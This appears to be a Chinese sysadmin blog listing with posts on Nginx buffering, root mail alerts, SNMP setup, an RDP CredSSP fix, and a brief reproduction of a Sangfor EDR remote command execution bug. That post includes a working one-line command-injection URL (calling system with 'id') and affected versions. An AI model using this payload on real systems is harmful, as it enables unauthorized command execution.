解决Nginx报错：an upstream response is buffered to a temporary file

发表于 2020-09-24 | 分类于日常运维 | 暂无评论 | 字数 210

最近某个应用用户登录的时候登录不上，应用跳转不过去。
发现Nginx下有错误日志：

2020/09/15 17:17:28 [warn] 1427#1427: *1786 an upstream response is buffered to a temporary file

这个问题应该是请求头过大，fastcgi_buffers默认设置太小导致，贴个Nginx的buffer机制：

当被代理服务器向nginx proxy发送数据时，proxy buffer会判断本次响应的数据量的大小。
如果buffer足够，那么本次响应数据直接写入buffer。
如果buffer装不下本次响应的数据，那么nginx服务器会将部分接收到的数据临时存放在磁盘的临时文件中，磁盘上的临时文件路径可以通过proxy_temp_path指定，临时文件的大小有proxy_max_temp_file_size和proxy_temp_file_write_size指令决定
一次响应数据接收完成或者buffer已经转满，nginx服务器开始向客户端传输数据

修改Nginx配置文件：

fastcgi_buffer_size 512k;
fastcgi_buffers 6 512k;
fastcgi_busy_buffers_size 512k;
fastcgi_temp_file_write_size 512k;

业务恢复正常

深信服终端检测响应平台（EDR）RCE复现

发表于 2020-08-17 | 分类于网络安全 | 暂无评论 | 字数 270

EDR简介

终端检测响应平台（EDR）是深信服公司提供的一套终端安全解决方案，方案由轻量级的端点安全软件（Agent）和管理平台（管理平台）共同组成。
EDR 的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查，支持微隔离的访问控制策略统一管理，支持对安全事件的一键隔离处置，以及热点事件 IOC 的全网威胁定位。
端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。深信服的 EDR 产品也支持与 AC、SIP、AF、SOC、X-central 产品的联动协同响应，形成新一代的安全防护体系。

20200818更新官方说明

https://mp.weixin.qq.com/s/nAEqjeCm34t1yD5Kh7ZJxA
EDR UI界面

RCE复现

POC：https://xxx.xxx/tool/log/c.php?strip_slashes=system&host=id
默认控制台为443端口，若有更改自行加上端口。

影响范围

我这边用最新的版本复现失败，后跟厂商确认，最新版本3.2.21已修复该问题，受影响的应该是EDR v3.2.16、v3.2.17和v3.2.19。
HW第一天就是精彩。

解决You have new mail in /var/spool/mail/root

发表于 2020-07-27 | 分类于日常运维 | 暂无评论 | 字数 154

问题描述：终端远程登陆后经常提示You have new mail in /var/spool/mail/root
这个提示是LINUX会定时查看LINUX各种状态做汇总，每经过一段时间会把汇总的信息发送的root的邮箱里，以供有需之时查看。
一般这种情况mail的内容就只是一些正常的系统信息或者是比较重要的错误报告。如果你安装了mutt的话直接用这个命令就可以查看mail的内容（用root登陆先），没有装的话用cat /var/spool/mail/root查看（用root登陆先）。

解决方案：
第一步：关闭提示

[root@localhost ~]# echo "unset MAILCHECK">> /etc/profile
[root@localhost ~]# source /etc/profile

第二步：查看

[root@localhost ~]# ls -lth /var/spool/mail/

第三步：清空

[root@localhost ~]# cat /dev/null > /var/spool/mail/root

centos安装并配置snmp服务

发表于 2020-07-27 | 分类于日常运维 | 暂无评论 | 字数 353

0x00 安装snmp服务

通过yum安装snmp：

[root@localhost ~]# yum -y install net-snmp net-snmp-utils
已加载插件：fastestmirror, langpacks
Loading mirror speeds from cached hostfile
epel/x86_64/metalink                                                                                                                                                                                              | 9.3 kB  00:00:00     
 * base: mirrors.aliyun.com
 * epel: hkg.mirror.rackspace.com
 * extras: mirrors.cn99.com
 * updates: mirrors.aliyun.com
base                                                                                                                                                                                                              | 3.6 kB  00:00:00     
extras                                                                                                                                                                                                            | 2.9 kB  00:00:00     
updates                                                                                                                                                                                                           | 2.9 kB  00:00:00     
正在解决依赖关系
--> 正在检查事务
---> 软件包 net-snmp.x86_64.1.5.7.2-48.el7_8.1 将被 安装
--> 正在处理依赖关系 net-snmp-agent-libs = 1:5.7.2-48.el7_8.1，它被软件包 1:net-snmp-5.7.2-48.el7_8.1.x86_64 需要
--> 正在处理依赖关系 libnetsnmptrapd.so.31()(64bit)，它被软件包 1:net-snmp-5.7.2-48.el7_8.1.x86_64 需要
--> 正在处理依赖关系 libnetsnmpmibs.so.31()(64bit)，它被软件包 1:net-snmp-5.7.2-48.el7_8.1.x86_64 需要
--> 正在处理依赖关系 libnetsnmpagent.so.31()(64bit)，它被软件包 1:net-snmp-5.7.2-48.el7_8.1.x86_64 需要
---> 软件包 net-snmp-utils.x86_64.1.5.7.2-48.el7_8.1 将被 安装
--> 正在检查事务
---> 软件包 net-snmp-agent-libs.x86_64.1.5.7.2-48.el7_8.1 将被 安装
--> 解决依赖关系完成

依赖关系解决

=========================================================================================================================================================================================================================================
 Package                                                        架构                                              版本                                                          源                                                  大小
=========================================================================================================================================================================================================================================
正在安装:
 net-snmp                                                       x86_64                                            1:5.7.2-48.el7_8.1                                            updates                                            332 k
 net-snmp-utils                                                 x86_64                                            1:5.7.2-48.el7_8.1                                            updates                                            200 k
为依赖而安装:
 net-snmp-agent-libs                                            x86_64                                            1:5.7.2-48.el7_8.1                                            updates                                            707 k

事务概要
=========================================================================================================================================================================================================================================
安装  2 软件包 (+1 依赖软件包)

总下载量：1.2 M
安装大小：3.3 M
Downloading packages:
(1/3): net-snmp-utils-5.7.2-48.el7_8.1.x86_64.rpm                                                                                                                                                                 | 200 kB  00:00:00     
(2/3): net-snmp-agent-libs-5.7.2-48.el7_8.1.x86_64.rpm                                                                                                                                                            | 707 kB  00:00:00     
(3/3): net-snmp-5.7.2-48.el7_8.1.x86_64.rpm                                                                                                                                                                       | 332 kB  00:00:00     
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
总计                                                                                                                                                                                                     3.4 MB/s | 1.2 MB  00:00:00     
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
  正在安装    : 1:net-snmp-agent-libs-5.7.2-48.el7_8.1.x86_64                                                                                                                                                                        1/3 
  正在安装    : 1:net-snmp-5.7.2-48.el7_8.1.x86_64                                                                                                                                                                                   2/3 
  正在安装    : 1:net-snmp-utils-5.7.2-48.el7_8.1.x86_64                                                                                                                                                                             3/3 
  验证中      : 1:net-snmp-agent-libs-5.7.2-48.el7_8.1.x86_64                                                                                                                                                                        1/3 
  验证中      : 1:net-snmp-5.7.2-48.el7_8.1.x86_64                                                                                                                                                                                   2/3 
  验证中      : 1:net-snmp-utils-5.7.2-48.el7_8.1.x86_64                                                                                                                                                                             3/3 

已安装:
  net-snmp.x86_64 1:5.7.2-48.el7_8.1                                                                               net-snmp-utils.x86_64 1:5.7.2-48.el7_8.1                                                                              

作为依赖被安装:
  net-snmp-agent-libs.x86_64 1:5.7.2-48.el7_8.1                                                                                                                                                                                          

完毕！

查看snmp版本：

[root@localhost ~]# snmpd -v

NET-SNMP version:  5.7.2
Web:               http://www.net-snmp.org/
Email:             net-snmp-coders@lists.sourceforge.net

启动snmp服务并添加启动项

阅读全文 »

解决远程桌面：出现身份验证错误/要求的函数不受支持

发表于 2020-07-03 | 分类于日常运维 | 暂无评论 | 字数 166

系统版本：Win10专业版 1909
问题描述：在通过mstsc登录某盟的堡垒机的时候出现如下报错：出现身份验证错误/要求的函数不受支持blablabla

解决方法：

运行gpedit.msc进入组策略。
进入计算机配置>管理模板>系统>凭据分配>加密数据库修正。
选择启用，更改保护级别为易受攻击后应用。

应用后再尝试远程桌面即可正常登录了。
PS.若无法找到加密数据库修正，通过找到路径：计算机HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem
在System文件夹内创建文件夹项：CredSSPParameters
然后在Parameters文件夹内，新建 DWORD（32）位值（D），名称为 AllowEncryptionOracle，值为2。